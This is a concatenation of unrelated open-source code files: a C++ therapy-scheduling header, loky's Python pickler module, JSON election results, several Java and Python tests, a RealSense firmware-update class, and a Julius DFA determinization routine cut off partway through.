ExeCm_SetScheduledActivities(const PXmlDoc& XmlDoc); TStr ExeCm_SetCatalogueHolidays(const PXmlDoc& XmlDoc); TStr ExeCm_MakeSchedule(const PXmlDoc& XmlDoc); TStr ExeCm_CheckSchedule(const PXmlDoc& XmlDoc); // therapy places bool IsTherapyPlacesOk(TStr& MsgStr) const; int GetTherapyPlaces() const; PXmlTok GetTherapyPlace(const int& TherapyPlaceN) const; // field-retrieval TStr GetTherapyPlace_Code(const PXmlTok& TherapyPlace) const { return GetFldVal(TherapyPlace, "Code");} TStr GetTherapyPlace_Type(const PXmlTok& TherapyPlace) const { return GetFldVal(TherapyPlace, "Type");} TStr GetTherapyPlace_Location(const PXmlTok& TherapyPlace) const { return GetFldVal(TherapyPlace, "Location");} TStr GetTherapyPlace_Capacity(const PXmlTok& TherapyPlace) const { return GetFldVal(TherapyPlace, "Capacity");} TStr GetTherapyPlace_Distance(const PXmlTok& TherapyPlace) const { return GetFldVal(TherapyPlace, "Distance");} TStr GetTherapyPlace_Gender(const PXmlTok& TherapyPlace) const { return GetFldVal(TherapyPlace, "Gender");} TStr GetTherapyPlace_AlternateScheduling(const PXmlTok& TherapyPlace) const { return GetFldVal(TherapyPlace, "AlternateScheduling");} TStr GetTherapyPlace_FamilyScheduling(const PXmlTok& TherapyPlace) const { return GetFldVal(TherapyPlace, "FamilyScheduling");} TStr GetTherapyPlace_TherapistType(const PXmlTok& TherapyPlace) const { return GetFldVal(TherapyPlace, "TherapistType");} // activities bool IsActivitiesOk(TStr& MsgStr) const; int GetActivities() const; PXmlTok GetActivity(const int& ActivityN) const; // field-retrieval TStr GetActivity_Code(const PXmlTok& Activity) const { return GetFldVal(Activity, "Code");} TStr GetActivity_Type(const PXmlTok& Activity) const { return GetFldVal(Activity, "Type");} TStr GetActivity_Name(const PXmlTok& Activity) const { return GetFldVal(Activity, "Name");} TStr GetActivity_Priority(const PXmlTok& Activity) const { return GetFldVal(Activity, "Priority");} TStr GetActivity_Duration(const PXmlTok& Activity) const { TStr DurationSecsStr=GetFldVal(Activity, "Duration"); int DurationSecs=DurationSecsStr.GetInt(0); int DurationMins=DurationSecs/60; return TInt::GetStr(DurationMins);} TStr GetActivity_TPDuration(const PXmlTok& Activity) const { TStr DurationSecsStr=GetFldVal(Activity, "TPDuration"); int DurationSecs=DurationSecsStr.GetInt(0); int DurationMins=DurationSecs/60; return TInt::GetStr(DurationMins);} TStr GetActivity_PatientDuration(const PXmlTok& Activity) const { TStr DurationSecsStr=GetFldVal(Activity, "PatientDuration"); int DurationSecs=DurationSecsStr.GetInt(0); int DurationMins=DurationSecs/60; return TInt::GetStr(DurationMins);} TStr GetActivity_TherapistDurationPreparation(const PXmlTok& Activity) const { return GetFldVal(Activity, "TherapistDuration|Preparation");} TStr GetActivity_TherapistDurationExecution(const PXmlTok& Activity) const { return GetFldVal(Activity, "TherapistDuration|Execution");} TStr GetActivity_TherapistDurationAdditionalTime(const PXmlTok& Activity) const { return GetFldVal(Activity, "TherapistDuration|AdditionalTime");} TStr GetActivity_Weariness(const PXmlTok& Activity) const { return GetFldVal(Activity, "Weariness");} TStr GetActivity_Dry(const PXmlTok& Activity) const { return GetFldVal(Activity, "Dry");} // available therapy places bool IsAvailableTherapyPlacesOk(TStr& MsgStr) const; int GetAvailableTherapyPlaces() const; PXmlTok GetAvailableTherapyPlace(const int& AvailableTherapyPlaceN) const; TStr GetAvailableTherapyPlace_Code(const PXmlTok& AvailableTherapyPlace) const { return GetFldVal(AvailableTherapyPlace, "Code");} int GetTherapyPlaceSchedules(const PXmlTok& AvailableTherapyPlace) const; PXmlTok GetTherapyPlaceSchedule( const PXmlTok& AvailableTherapyPlace, const int& TherapyPlaceScheduleN) const; // therapy-place-schedule TStrV GetTherapyPlaceSchedule_WeekDays(const PXmlTok& TherapyPlaceSchedule) const { return GetFldValV(TherapyPlaceSchedule, "Days", "Day");} TStr GetTherapyPlaceSchedule_OpenFrom(const PXmlTok& TherapyPlaceSchedule) const { return GetFldVal(TherapyPlaceSchedule, "OpenTimes|Open|From");} TStr GetTherapyPlaceSchedule_OpenTill(const PXmlTok& TherapyPlaceSchedule) const { return GetFldVal(TherapyPlaceSchedule, "OpenTimes|Open|Till");} TStr GetTherapyPlaceSchedule_ValidFrom(const PXmlTok& TherapyPlaceSchedule) const { return GetFldDateVal(TherapyPlaceSchedule, "ValidFrom");} TStr GetTherapyPlaceSchedule_ValidTo(const PXmlTok& TherapyPlaceSchedule) const { return GetFldDateVal(TherapyPlaceSchedule, "ValidTo");} // available activities bool IsAvailableActivitiesOk(TStr& MsgStr) const; int GetAvailableActivities() const; PXmlTok GetAvailableActivity(const int& AvailableActivityN) const; TStr GetAvailableActivity_Code(const PXmlTok& AvailableActivity) const { return GetFldVal(AvailableActivity, "Code");} int GetActivitySchedules(const PXmlTok& AvailableActivity) const; PXmlTok GetActivitySchedule( const PXmlTok& AvailableActivity, const int& ActivityScheduleN) const; // activity-schedule TStrV GetActivitySchedule_WeekDays(const PXmlTok& TherapyPlaceSchedule) const { return GetFldValV(TherapyPlaceSchedule, "Days", "Day");} TStr GetActivitySchedule_StartTime(const PXmlTok& TherapyPlaceSchedule) const { return GetFldVal(TherapyPlaceSchedule, "StartTime");} TStr GetActivitySchedule_EndTime(const PXmlTok& TherapyPlaceSchedule) const { return GetFldVal(TherapyPlaceSchedule, "EndTime");} TStr GetActivitySchedule_TherapyPlaceType(const PXmlTok& TherapyPlaceSchedule) const { return GetFldVal(TherapyPlaceSchedule, "TherapyPlaceType");} TStr GetActivitySchedule_Gender(const PXmlTok& TherapyPlaceSchedule) const { return GetFldVal(TherapyPlaceSchedule, "Attributes|Gender");} TStr GetActivitySchedule_ValidFrom(const PXmlTok& TherapyPlaceSchedule) const { return GetFldDateVal(TherapyPlaceSchedule, "ValidFrom");} TStr GetActivitySchedule_ValidTo(const PXmlTok& TherapyPlaceSchedule) const { return GetFldDateVal(TherapyPlaceSchedule, "ValidTo");} // scheduled-activities bool IsScheduledActivitiesOk(TStr& MsgStr) const; int GetScheduledActivities() const; PXmlTok GetScheduledActivity(const int& ScheduledActivityN) const; // field-retrieval TStr GetScheduledActivity_Code(const PXmlTok& ScheduledActivity) const { return GetFldVal(ScheduledActivity, "Code");} TStr GetScheduledActivity_PatientATPCode(const PXmlTok& ScheduledActivity) const { return GetFldVal(ScheduledActivity, "ATPCode");} TStr GetScheduledActivity_Patient(const PXmlTok& ScheduledActivity) const { return GetFldVal(ScheduledActivity, "Code");} TStr GetScheduledActivity_TherapistCode(const PXmlTok& ScheduledActivity) const { return GetFldVal(ScheduledActivity, "TherapistCode");} TStr GetScheduledActivity_StartDateTime(const PXmlTok& ScheduledActivity) const { return GetFldDateVal(ScheduledActivity, "StartDateTime");} TStr GetScheduledActivity_RepetitionNumber(const PXmlTok& ScheduledActivity) const { return GetFldVal(ScheduledActivity, "RepetitionNumber");} TStr GetScheduledActivity_StartingPoint(const PXmlTok& ScheduledActivity) const { return GetFldVal(ScheduledActivity, "StartingPoint");} TStr GetScheduledActivity_PatientCode(const PXmlTok& ScheduledActivity) const { return GetFldVal(ScheduledActivity, "PatientCode");} TStr GetScheduledActivity_ActivityCode(const PXmlTok& ScheduledActivity) const { return GetFldVal(ScheduledActivity, "ActivityCode");} TStr GetScheduledActivity_TherapyPlaceCode(const PXmlTok& ScheduledActivity) const { return GetFldVal(ScheduledActivity, "TherapyPlaceCode");} TStr GetScheduledActivity_Date(const PXmlTok& ScheduledActivity) const { return GetFldVal(ScheduledActivity, "Date");} TStr GetScheduledActivity_StartTime(const PXmlTok& ScheduledActivity) const { return GetFldVal(ScheduledActivity, "StartTime");} TStr GetScheduledActivity_PatientDuration(const PXmlTok& ScheduledActivity) const { return GetFldVal(ScheduledActivity, "PatientDuration");} TStr GetScheduledActivity_TPDuration(const PXmlTok& ScheduledActivity) const { return GetFldVal(ScheduledActivity, "TPDuration");} TStr GetScheduledActivity_Accordance(const PXmlTok& ScheduledActivity) const { return GetFldVal(ScheduledActivity, "Accordance");} // holidays bool IsHolidaysOk(TStr& MsgStr) const; int GetHolidays() const; PXmlTok GetHoliday(const int& HolidayN) const; // field-retrieval TStr GetHoliday_Date(const PXmlTok& Holiday) const { return GetFldDateVal(Holiday, "");} // make schedule bool IsMakeScheduleOk(TStr& MsgStr) const; TStr GetMakeSchedule_PatientCode() const { return GetFldVal(MakeScheduleXmlDoc, "Operation|Parameter|Patient|Code");} TStr GetMakeSchedule_PatientGender() const { return GetFldVal(MakeScheduleXmlDoc, "Operation|Parameter|Patient|Attributes|Gender");} TStr GetMakeSchedule_PatientFamily() const { return GetFldVal(MakeScheduleXmlDoc, "Operation|Parameter|Patient|Attributes|Family");} TStr GetMakeSchedule_PatientATPCode() const { return GetFldVal(MakeScheduleXmlDoc, "Operation|Parameter|Patient|ATPCode");} int GetMakeSchedule_PlanRequests() const; PXmlTok GetMakeSchedule_PlanRequest(const int& PlanRequestN) const; TStr GetMakeSchedule_PlanRequest_ActivityCode(const PXmlTok& PlanRequest) const { return GetFldVal(PlanRequest, "ActivityCode");} TStr GetMakeSchedule_PlanRequest_Quantity(const PXmlTok& PlanRequest) const { return GetFldVal(PlanRequest, "Quantity");} TStr GetMakeSchedule_PlanRequest_DayQuantity(const PXmlTok& PlanRequest) const { return GetFldVal(PlanRequest, "DayQuantity");} TStr GetMakeSchedule_PlanRequest_Frequency(const PXmlTok& PlanRequest) const { return GetFldVal(PlanRequest, "Frequency");} TStr GetMakeSchedule_PlanRequest_AlternatingActivityCode(const PXmlTok& PlanRequest) const { return GetFldVal(PlanRequest, "AlternatingActivityCode");} TStrV GetMakeSchedule_PlanRequest_ExcludedActivities_ActivityCode(const PXmlTok& PlanRequest) const { return GetFldValV(PlanRequest, "ExcludedActivities", "ExcludedActivity", "ActivityCode");} TStrV GetMakeSchedule_PlanRequest_ExcludedActivities_Time(const PXmlTok& PlanRequest) const { TStrV TimeStrV=GetFldValV(PlanRequest, "ExcludedActivities", "ExcludedActivity", "Time"); for (int TimeStrN=0; TimeStrN<TimeStrV.Len(); TimeStrN++){ TimeStrV[TimeStrN]=TInt::GetStr(TimeStrV[TimeStrN].GetInt(0)/60);} return TimeStrV; } TStr GetMakeSchedule_PlanRequest_FamilyActivity(const PXmlTok& PlanRequest) const { return GetFldVal(PlanRequest, "FamilyActivity");} TStr GetMakeSchedule_PlanRequest_TreatmentDate(const PXmlTok& PlanRequest) const { return GetFldDateVal(PlanRequest, "TreatmentDate");} TStr GetMakeSchedule_PlanRequest_DesiredStartTime(const PXmlTok& PlanRequest) const { return GetFldVal(PlanRequest, "DesiredStartTime");} TStr GetMakeSchedule_PlanRequest_DesiredFinishTime(const PXmlTok& PlanRequest) const { return GetFldVal(PlanRequest, "DesiredFinishTime");} TStr GetMakeSchedule_PlanRequest_AttrNm(const PXmlTok& PlanRequest) const { TStr FldVal=GetFldVal(PlanRequest, "Attributes|Name"); if (FldVal=="Family"){return "DRUZINA";} if (FldVal=="Gender"){return "SPOL_300";} return FldVal.GetUc();} // check schedule bool IsCheckScheduleOk(TStr& MsgStr) const; TStr GetCheckSchedule_PatientCode() const { return GetFldVal(CheckScheduleXmlDoc, "Operation|Parameter|Patient|Code");} TStr GetCheckSchedule_PatientGender() const { return GetFldVal(CheckScheduleXmlDoc, "Operation|Parameter|Patient|Gender");} TStr GetCheckSchedule_PatientATPCode() const { return GetFldVal(CheckScheduleXmlDoc, "Operation|Parameter|Patient|ATPCode");} TStr GetCheckSchedule_IntRequestedActivityActivityCode() const { return GetFldVal(CheckScheduleXmlDoc, "Operation|Parameter|IntRequestedActivity|ActivityCode");} TStr GetCheckSchedule_IntRequestedActivityDayQuantity() const { return GetFldVal(CheckScheduleXmlDoc, "Operation|Parameter|IntRequestedActivity|DayQuantity");} TStr GetCheckSchedule_IntRequestedActivityTreatmentDate() const { return GetFldDateVal(CheckScheduleXmlDoc, "Operation|Parameter|IntRequestedActivity|TreatmentDate");} TStr GetCheckSchedule_IntRequestedActivityDesiredStartTime() const { return GetFldVal(CheckScheduleXmlDoc, "Operation|Parameter|IntRequestedActivity|DesiredStartTime");} TStr GetCheckSchedule_IntRequestedActivityDesiredFinishTime() const { return GetFldVal(CheckScheduleXmlDoc, "Operation|Parameter|IntRequestedActivity|DesiredFinishTime");} // field saving void SaveFldDef(FILE* FId, const TStr& FldNm) const { fprintf(FId, "\"%s\"\r\n", FldNm.CStr());} void SaveFldVal(FILE* FId, const TStr& FldVal, const bool& EolnP=false) const { fprintf(FId, "\"%s\"", FldVal.CStr()); if (EolnP){fprintf(FId, "\r\n");} else {fprintf(FId, ",");}} void SaveFldValV(FILE* FId, const TStrV& FldValV, const bool& EolnP=false) const { fprintf(FId, "\""); for (int FldValN=0; FldValN<FldValV.Len(); FldValN++){ if (FldValN!=0){fprintf(FId, ",");} fprintf(FId, "%s", FldValV[FldValN].CStr()); } fprintf(FId, "\""); if (EolnP){fprintf(FId, "\r\n");} else {fprintf(FId, ",");}} // save to CSV & XML static void SaveCsvToXml( const TStr& DefFNm, const TStr& DatFNm, const TStr& OutXmlFNm); static void SaveCsvToXmlParamOut( const TStr& DefFNm, const TStr& DatFNm, const TStr& OutXmlFNm); void SaveOldCsv() const; void SaveOldCsv_KatalogZdrDelavcev() const; void SaveOldCsv_KatalogAparatov() const; void SaveOldCsv_KatalogAktivnosti() const; void SaveOldCsv_UrnikZaTerapevte() const; void SaveOldCsv_UrnikZaAparate() const; void SaveOldCsv_UrnikAktivnosti() const; void SaveOldCsv_MozniTerminiVDnevu() const; void SaveOldCsv_Prazniki() const; void SaveOldCsv_PredpisaneTerapije() const; void SaveOldCsv_PlaniraneAktivnosti() const; void SaveOldCsv_UrnikXX() const; // DLL functions static PThermalSch DllThermalSch; static void DllNewThermalSch(){ DllThermalSch=TThermalSch::New();} static char* DllExeCmFromXmlFile(char* FNm, char* FPath); static char* DllExeCmFromXmlStr(char* XmlStr); }; #endif
6,138
6,989
<reponame>avrumnoor/NewsSummarizer ############################################################################### # Customizable Pickler with some basic reducers # # author: <NAME> # # adapted from multiprocessing/reduction.py (17/02/2017) # * Replace the ForkingPickler with a similar _LokyPickler, # * Add CustomizableLokyPickler to allow customizing pickling process # on the fly. # import io import os import sys import functools from multiprocessing import util import types try: # Python 2 compat from cPickle import loads as pickle_loads except ImportError: from pickle import loads as pickle_loads import copyreg from pickle import HIGHEST_PROTOCOL if sys.platform == "win32": if sys.version_info[:2] > (3, 3): from multiprocessing.reduction import duplicate else: from multiprocessing.forking import duplicate ############################################################################### # Enable custom pickling in Loky. # To allow instance customization of the pickling process, we use 2 classes. # _ReducerRegistry gives module level customization and CustomizablePickler # permits to use instance base custom reducers. Only CustomizablePickler # should be used. class _ReducerRegistry(object): """Registry for custom reducers. HIGHEST_PROTOCOL is selected by default as this pickler is used to pickle ephemeral datastructures for interprocess communication hence no backward compatibility is required. """ # We override the pure Python pickler as its the only way to be able to # customize the dispatch table without side effects in Python 2.6 # to 3.2. For Python 3.3+ leverage the new dispatch_table # feature from http://bugs.python.org/issue14166 that makes it possible # to use the C implementation of the Pickler which is faster. dispatch_table = {} @classmethod def register(cls, type, reduce_func): """Attach a reducer function to a given type in the dispatch table.""" if sys.version_info < (3,): # Python 2 pickler dispatching is not explicitly customizable. # Let us use a closure to workaround this limitation. def dispatcher(cls, obj): reduced = reduce_func(obj) cls.save_reduce(obj=obj, *reduced) cls.dispatch_table[type] = dispatcher else: cls.dispatch_table[type] = reduce_func ############################################################################### # Registers extra pickling routines to improve picklization for loky register = _ReducerRegistry.register # make methods picklable def _reduce_method(m): if m.__self__ is None: return getattr, (m.__class__, m.__func__.__name__) else: return getattr, (m.__self__, m.__func__.__name__) class _C: def f(self): pass @classmethod def h(cls): pass register(type(_C().f), _reduce_method) register(type(_C.h), _reduce_method) if not hasattr(sys, "pypy_version_info"): # PyPy uses functions instead of method_descriptors and wrapper_descriptors def _reduce_method_descriptor(m): return getattr, (m.__objclass__, m.__name__) register(type(list.append), _reduce_method_descriptor) register(type(int.__add__), _reduce_method_descriptor) # Make partial func pickable def _reduce_partial(p): return _rebuild_partial, (p.func, p.args, p.keywords or {}) def _rebuild_partial(func, args, keywords): return functools.partial(func, *args, **keywords) register(functools.partial, _reduce_partial) if sys.platform != "win32": from ._posix_reduction import _mk_inheritable # noqa: F401 else: from . import _win_reduction # noqa: F401 # global variable to change the pickler behavior try: from joblib.externals import cloudpickle # noqa: F401 DEFAULT_ENV = "cloudpickle" except ImportError: # If cloudpickle is not present, fallback to pickle DEFAULT_ENV = "pickle" ENV_LOKY_PICKLER = os.environ.get("LOKY_PICKLER", DEFAULT_ENV) _LokyPickler = None _loky_pickler_name = None def set_loky_pickler(loky_pickler=None): global _LokyPickler, _loky_pickler_name if loky_pickler is None: loky_pickler = ENV_LOKY_PICKLER loky_pickler_cls = None # The default loky_pickler is cloudpickle if loky_pickler in ["", None]: loky_pickler = "cloudpickle" if loky_pickler == _loky_pickler_name: return if loky_pickler == "cloudpickle": from joblib.externals.cloudpickle import CloudPickler as loky_pickler_cls else: try: from importlib import import_module module_pickle = import_module(loky_pickler) loky_pickler_cls = module_pickle.Pickler except (ImportError, AttributeError) as e: extra_info = ("\nThis error occurred while setting loky_pickler to" " '{}', as required by the env variable LOKY_PICKLER" " or the function set_loky_pickler." .format(loky_pickler)) e.args = (e.args[0] + extra_info,) + e.args[1:] e.msg = e.args[0] raise e util.debug("Using '{}' for serialization." .format(loky_pickler if loky_pickler else "cloudpickle")) class CustomizablePickler(loky_pickler_cls): _loky_pickler_cls = loky_pickler_cls def _set_dispatch_table(self, dispatch_table): for ancestor_class in self._loky_pickler_cls.mro(): dt_attribute = getattr(ancestor_class, "dispatch_table", None) if isinstance(dt_attribute, types.MemberDescriptorType): # Ancestor class (typically _pickle.Pickler) has a # member_descriptor for its "dispatch_table" attribute. Use # it to set the dispatch_table as a member instead of a # dynamic attribute in the __dict__ of the instance, # otherwise it will not be taken into account by the C # implementation of the dump method if a subclass defines a # class-level dispatch_table attribute as was done in # cloudpickle 1.6.0: # https://github.com/joblib/loky/pull/260 dt_attribute.__set__(self, dispatch_table) break # On top of member descriptor set, also use setattr such that code # that directly access self.dispatch_table gets a consistent view # of the same table. self.dispatch_table = dispatch_table def __init__(self, writer, reducers=None, protocol=HIGHEST_PROTOCOL): loky_pickler_cls.__init__(self, writer, protocol=protocol) if reducers is None: reducers = {} if sys.version_info < (3,): self.dispatch = loky_pickler_cls.dispatch.copy() self.dispatch.update(_ReducerRegistry.dispatch_table) else: if hasattr(self, "dispatch_table"): # Force a copy that we will update without mutating the # any class level defined dispatch_table. loky_dt = dict(self.dispatch_table) else: # Use standard reducers as bases loky_dt = copyreg.dispatch_table.copy() # Register loky specific reducers loky_dt.update(_ReducerRegistry.dispatch_table) # Set the new dispatch table, taking care of the fact that we # need to use the member_descriptor when we inherit from a # subclass of the C implementation of the Pickler base class # with an class level dispatch_table attribute. self._set_dispatch_table(loky_dt) # Register custom reducers for type, reduce_func in reducers.items(): self.register(type, reduce_func) def register(self, type, reduce_func): """Attach a reducer function to a given type in the dispatch table. """ if sys.version_info < (3,): # Python 2 pickler dispatching is not explicitly customizable. # Let us use a closure to workaround this limitation. def dispatcher(self, obj): reduced = reduce_func(obj) self.save_reduce(obj=obj, *reduced) self.dispatch[type] = dispatcher else: self.dispatch_table[type] = reduce_func _LokyPickler = CustomizablePickler _loky_pickler_name = loky_pickler def get_loky_pickler_name(): global _loky_pickler_name return _loky_pickler_name def get_loky_pickler(): global _LokyPickler return _LokyPickler # Set it to its default value set_loky_pickler() def loads(buf): # Compat for python2.7 version if sys.version_info < (3, 3) and isinstance(buf, io.BytesIO): buf = buf.getvalue() return pickle_loads(buf) def dump(obj, file, reducers=None, protocol=None): '''Replacement for pickle.dump() using _LokyPickler.''' global _LokyPickler _LokyPickler(file, reducers=reducers, protocol=protocol).dump(obj) def dumps(obj, reducers=None, protocol=None): global _LokyPickler buf = io.BytesIO() dump(obj, buf, reducers=reducers, protocol=protocol) if sys.version_info < (3, 3): return buf.getvalue() return buf.getbuffer() __all__ = ["dump", "dumps", "loads", "register", "set_loky_pickler"] if sys.platform == "win32": __all__ += ["duplicate"]
4,029
348
<gh_stars>100-1000 {"nom":"Saint-Thibault-des-Vignes","circ":"7ème circonscription","dpt":"Seine-et-Marne","inscrits":4604,"abs":2855,"votants":1749,"blancs":155,"nuls":22,"exp":1572,"res":[{"nuance":"REM","nom":"<NAME>","voix":1172},{"nuance":"FN","nom":"Mme <NAME>","voix":400}]}
117
305
<reponame>victormaneac/mamute package org.mamute.model; import static org.junit.Assert.assertEquals; import static org.mockito.Mockito.mock; import static org.mockito.Mockito.when; import javax.servlet.http.Cookie; import javax.servlet.http.HttpServletRequest; import javax.servlet.http.HttpServletResponse; import org.junit.Before; import org.junit.Test; import org.mamute.builder.NewsBuilder; import org.mamute.builder.QuestionBuilder; import org.mamute.dao.TestCase; import org.mamute.model.News; import org.mamute.model.Question; import org.mamute.model.post.PostViewCounter; public class PostViewCounterTest extends TestCase { private HttpServletRequest request; private HttpServletResponse response; private PostViewCounter questionViewCounter; @Before public void setup() { request = mock(HttpServletRequest.class); response = mock(HttpServletResponse.class); questionViewCounter = new PostViewCounter(request, response); when(request.getCookies()).thenReturn(new Cookie[] {}); } @Test public void should_increase_count_only_first_time() { Question question = new QuestionBuilder().withId(1l).build(); questionViewCounter.ping(question); mockQuestionVisited(question); assertEquals(1l, question.getViews()); questionViewCounter.ping(question); assertEquals(1l, question.getViews()); } @Test public void should_increase_count_only_the_news_counter() { Question question = new QuestionBuilder().withId(1l).build(); News news = new NewsBuilder().withId(1l).build(); questionViewCounter.ping(question); mockQuestionVisited(question); questionViewCounter.ping(news); assertEquals(1l, question.getViews()); assertEquals(1l, news.getViews()); } private void mockQuestionVisited(Question question) { Cookie cookie = new Cookie(questionViewCounter.cookieKeyFor(question), "1"); when(request.getCookies()).thenReturn(new Cookie[] { cookie }); } }
640
1,184
import unittest from russian_peasant import russian_peasant as rp class RussianPeasantTest(unittest.TestCase): def test_correct(self): self.assertEquals(rp(5,15), 75) if __name__ == '__main__': unittest.main()
85
908
package com.googlecode.jsonrpc4j.util; import java.util.ArrayList; import java.util.Collection; @SuppressWarnings("unused") public interface FakeServiceInterface { void doSomething(); int returnPrimitiveInt(int arg); CustomClass returnCustomClass(int arg1, String arg2); void throwSomeException(String message); class CustomClass { public final int integer; public final String string; public final Collection<String> list = new ArrayList<>(); public CustomClass() { this(0, ""); } CustomClass(final int integer, final String string) { this.integer = integer; this.string = string; } } }
217
331
/** * Copyright (C) 2016 - 2030 youtongluan. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.yx.rpc.codec.encoders; import org.yx.annotation.Bean; import org.yx.common.codec.StreamAble; import org.yx.rpc.transport.DataBuffer; @Bean public class StreamAbleEncoder extends AbstractEncoder<StreamAble> { @Override public void encodeBody(StreamAble req, DataBuffer buffer) throws Exception { req.writeTo(buffer); } @Override protected StreamAble convert(Object message) { if (message instanceof StreamAble) { return (StreamAble) message; } return null; } @Override protected int getMessageType(StreamAble req) { return req.getMessageType(); } }
365
6,457
<filename>src/ivcam/sr300-fw-update-device.cpp // License: Apache 2.0. See LICENSE file in root directory. // Copyright(c) 2019 Intel Corporation. All Rights Reserved. #include "sr300-fw-update-device.h" #include "ivcam-private.h" #include <chrono> #include <thread> namespace librealsense { sr300_update_device::sr300_update_device(std::shared_ptr<context> ctx, bool register_device_notifications, std::shared_ptr<platform::usb_device> usb_device) : update_device(ctx, register_device_notifications, usb_device), _name("Intel RealSense SR300 Recovery"), _product_line("SR300") { _serial_number = parse_serial_number(_serial_number_buffer); } void sr300_update_device::update(const void* fw_image, int fw_image_size, update_progress_callback_ptr callback) const { update_device::update(fw_image, fw_image_size, callback); // wait for the device to come back from recovery state, TODO: check cause std::this_thread::sleep_for(std::chrono::seconds(10)); } std::string sr300_update_device::parse_serial_number(const std::vector<uint8_t>& buffer) const { if (buffer.size() != sizeof(serial_number_data)) throw std::runtime_error("DFU - failed to parse serial number!"); std::stringstream rv; for (auto i = 0; i < ivcam::module_serial_size; i++) rv << std::setfill('0') << std::setw(2) << std::hex << static_cast<int>(buffer[i]); return rv.str(); } }
561
1,584
<reponame>ddugovic/julius4 /** * @file dfa_determinize.c * * @brief Determinize DFA for Julian grammar. * * @author <NAME> * @date Wed Oct 4 17:42:16 2006 * * $Revision: 1.5 $ * */ /* * Copyright (c) 2006-2013 Kawahara Lab., Kyoto University * Copyright (c) 2006-2013 Julius project team, Nagoya Institute of Technology * All rights reserved */ #include <sent/stddefs.h> #include <sent/dfa.h> #undef DEBUG ///< Define this to enable debug output static DFA_INFO *dfa; ///< Input DFA info static char buf[MAXLINELEN]; ///< Local text buffer to read in /** * Get one line, stripping carriage return and newline. * * @param buf [in] text buffer * @param maxlen [in] maximum length of @a buf * @param fp [in] file pointer * * @return pointer to the given buffer, or NULL when failed. * </EN> */ static char * mygetl(char *buf, int maxlen, FILE *fp) { int newline; while(fgets(buf, maxlen, fp) != NULL) { newline = strlen(buf)-1; /* chop newline */ if (buf[newline] == '\n') { buf[newline] = '\0'; newline--; } if (newline >= 0 && buf[newline] == '\r') buf[newline] = '\0'; if (buf[0] == '\0') continue; /* if blank line, read next */ return buf; } return NULL; } /** * Read in DFA file, line by line. Actual parser is in libsent library. * * @param fp [in] file pointer * @param dinfo [out] DFA info * * @return TRUE if succeeded. */ static boolean myrddfa(FILE *fp, DFA_INFO *dinfo) { int state_max, arc_num, terminal_max; dfa_state_init(dinfo); state_max = 0; arc_num = 0; terminal_max = 0; while (mygetl(buf, MAXLINELEN, fp) != NULL) { if (rddfa_line(buf, dinfo, &state_max, &arc_num, &terminal_max) == FALSE) { break; } } dinfo->state_num = state_max + 1; dinfo->arc_num = arc_num; dinfo->term_num = terminal_max + 1; return(TRUE); } /** * Output usage. * */ static void usage() { fprintf(stderr, "usage: dfa_determinize [dfafile] [-o outfile]\n"); } /************************************************************************/ /** * Structure to hold state set * */ typedef struct __stateq__ { char *s; ///< State index (if 1, the state is included) int len; ///< Buffer length of above. int checked; ///< flag to check if the outgoing arcs of this set is already examined void *ac; ///< Root pointer to the list of outgoing arcs. int start; ///< if 1, this should be a begin node int end; ///< if 1, this should eb an accept node int id; ///< assigned ID struct __stateq__ *next; ///< Pointer to the next state set. } STATEQ; /** * Structure to hold outgoing arcs from / to the stateset * */ typedef struct __arc__ { int label; ///< Input label ID STATEQ *to; ///< Destination state set struct __arc__ *next; ///< Pointer to the next arc } STATEQ_ARC; /** * Output information of a state set to stdout, for debug * * @param sq [in] state set */ void sput(STATEQ *sq) { int i; STATEQ_ARC *ac; for(i=0;i<sq->len;i++) { if (sq->s[i] == 1) printf("-%d", i); } printf("\n"); printf("checked: %d\n", sq->checked); printf("to:\n"); for(ac=sq->ac;ac;ac=ac->next) { printf("\t(%d) ", ac->label); for(i=0;i<ac->to->len;i++) { if (ac->to->s[i] == 1) printf("-%d", i); } printf("\n"); } } /** * Create a new state set. * * @param num [in] number of possible states * * @return pointer to the newly assigned state set. */ STATEQ * snew(int num) { STATEQ *new; int i; new = (STATEQ *)malloc(sizeof(STATEQ)); new->s = (char *)malloc(sizeof(char)*num); new->len = num; new->ac = NULL; new->next = NULL; for(i=0;i<num;i++) new->s[i] = 0; new->checked = 0; new->start = 0; new->end = 0; return new; } /** * Free the state set. * * @param sq */void sfree(STATEQ *sq) { STATEQ_ARC *sac, *atmp; sac=sq->ac; while(sac) { atmp = sac->next; free(sac); sac = atmp; } free(sq->s); free(sq); } static STATEQ *root = NULL; ///< root node of current list of state set /** * @brief Perform determinization. * * The result will be output in DFA format, to the specified file pointer. * * * @param dfa [in] original DFA info * @param fpout [in] output file pointer */ boolean determinize(DFA_INFO *dfa, FILE *fpout) { STATEQ *src, *stmp, *stest; STATEQ_ARC *sac; int i, t, tnum; DFA_ARC *ac; int *tlist; int modified; int arcnum, nodenum; STATEQ **slist; /* allocate work area */ tlist = (int *)malloc(sizeof(int) * dfa->state_num); /* set initial node (a state set with single initial state) */ src = NULL; for(i=0;i<dfa->state_num;i++) { if (dfa->st[i].status & INITIAL_S) { if (src == NULL) { src = snew(dfa->state_num); src->s[i] = 1; src->start = 1; root = src; } else { printf("Error: more than one initial node??\n"); return FALSE; } } } /* loop until no more state set is generated */ do { #ifdef DEBUG printf("---\n"); #endif modified = 0; for(src=root;src;src=src->next) { if (src->checked == 1) continue; #ifdef DEBUG printf("===checking===\n"); sput(src); printf("==============\n"); #endif for(t=0;t<dfa->term_num;t++) { /* examining an input label "t" on state set "src" */ /* get list of outgoing states from this state set by the input label "t", and set to tlist[0..tnum-1] */ tnum = 0; for(i=0;i<src->len;i++) { if (src->s[i] == 1) { for(ac=dfa->st[i].arc;ac;ac=ac->next) { if (ac->label == t) { tlist[tnum] = ac->to_state; tnum++; } } } } /* if no output with this label, skip it */ if (tnum == 0) continue; /* build the destination state set */ stest = snew(dfa->state_num); for(i=0;i<tnum;i++) { stest->s[tlist[i]] = 1; } #ifdef DEBUG printf("\tinput (%d) -> states: ", t); for(i=0;i<stest->len;i++) { if (stest->s[i] == 1) printf("-%d", i); } printf("\n"); #endif /* find if the destination state set is already generated */ for(stmp=root;stmp;stmp=stmp->next) { if (memcmp(stmp->s, stest->s, sizeof(char) * stest->len) ==0) { break; } } if (stmp == NULL) { /* not yet 